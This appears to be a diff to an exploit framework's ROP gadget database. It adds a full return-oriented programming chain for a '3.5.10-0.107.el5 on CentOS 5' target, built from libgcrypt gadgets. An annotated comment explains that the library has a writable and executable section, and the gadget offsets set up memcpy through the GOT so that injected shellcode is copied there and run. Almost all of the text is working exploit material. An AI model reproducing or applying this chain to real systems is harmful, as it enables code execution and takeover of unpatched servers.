|
260 | 260 |
|
261 | 261 | </rop>
|
262 | 262 |
|
| 263 | + <rop> |
| 264 | + <compatibility> |
| 265 | + <target>3.5.10-0.107.el5 on CentOS 5</target> |
| 266 | + </compatibility> |
263 | 267 |
|
| 268 | + <!-- |
| 269 | + yum list |grep libgcrypt |
| 270 | + libgcrypt.i386 1.4.4-5.el5 installed |
| 271 | + 02c63000-02ce1000 r-xp 00000000 fd:00 929390 /usr/lib/libgcrypt.so.11.5.2 |
| 272 | + 02ce1000-02ce4000 rwxp 0007d000 fd:00 929390 /usr/lib/libgcrypt.so.11.5.2 |
| 273 | + section is writable and executable, we'll copy the shellcode over there instead of using mmap |
| 274 | + --> |
| 275 | + |
| 276 | + <gadgets base="0"> |
| 277 | + <gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget> |
| 278 | + <gadget offset="0x0005e842">pop eax ; pop ebx ; pop esi ; pop edi ; ret || eax = ret eip from call esi, ebx = esp, esi = edi = junk</gadget> |
| 279 | + <gadget value ="0x00000000">ebp = junk to be skipped over</gadget> |
| 280 | + <gadget offset="0x00028374">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000007 ; call esi</gadget> |
| 281 | + <gadget value ="0x00000000">esi = junk to be skipped over</gadget> |
| 282 | + <gadget value ="0x00000000">edi = junk to be skipped over</gadget> |
| 283 | + <gadget offset="0x00062c29">xchg eax, ebx ; ret || eax = esp</gadget> |
| 284 | + <gadget offset="0x0006299c">pop ecx ; ret</gadget> |
| 285 | + <gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget> |
| 286 | + <gadget offset="0x0005a44d">add ecx, eax ; mov eax, ecx ; ret || eax = ecx = shellcode</gadget> |
| 287 | + <gadget offset="0x0006f5a1">pop edx ; inc ebx ; ret || set edx = to dst in memcpy for ret after pushad</gadget> |
| 288 | + <gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget> |
| 289 | + <gadget offset="0x0006a73f">pop eax ; ret</gadget> |
| 290 | + <gadget offset="0x0007effc">memcpy@got - 4</gadget> |
| 291 | + <gadget offset="0x00015e47">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget> |
| 292 | + <gadget offset="0x00062c29">xchg eax, ebx ; ret || ebx = @memcpy</gadget> |
| 293 | + <gadget offset="0x0001704e">mov eax, ecx ; ret || eax = ecx = src in memcpy</gadget> |
| 294 | + <gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget> |
| 295 | + <gadget offset="0x0007ef54">esi = offset of .got.plt section</gadget> |
| 296 | + <gadget value ="0x00000000">ebp = junk to be skipped over</gadget> |
| 297 | + <gadget offset="0x0006299c">pop ecx ; ret</gadget> |
| 298 | + <gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget> |
| 299 | + <gadget offset="0x00007a2b">pop edi ; pop ebp ** 1 **; ret</gadget> |
| 300 | + <gadget offset="0x00004276">(P) pop ebx ; pop esi ; pop ebp ; ret</gadget> |
| 301 | + <gadget value ="0x00000000">junk for ebp **1**</gadget> |
| 302 | + <gadget offset="0x0006200a">pushad ; ret</gadget> |
| 303 | + <gadget value ="size">payload size</gadget> |
| 304 | + </gadgets> |
| 305 | + |
| 306 | + |
| 307 | + </rop> |
264 | 308 |
|
265 | 309 |
|
266 | 310 |
|
|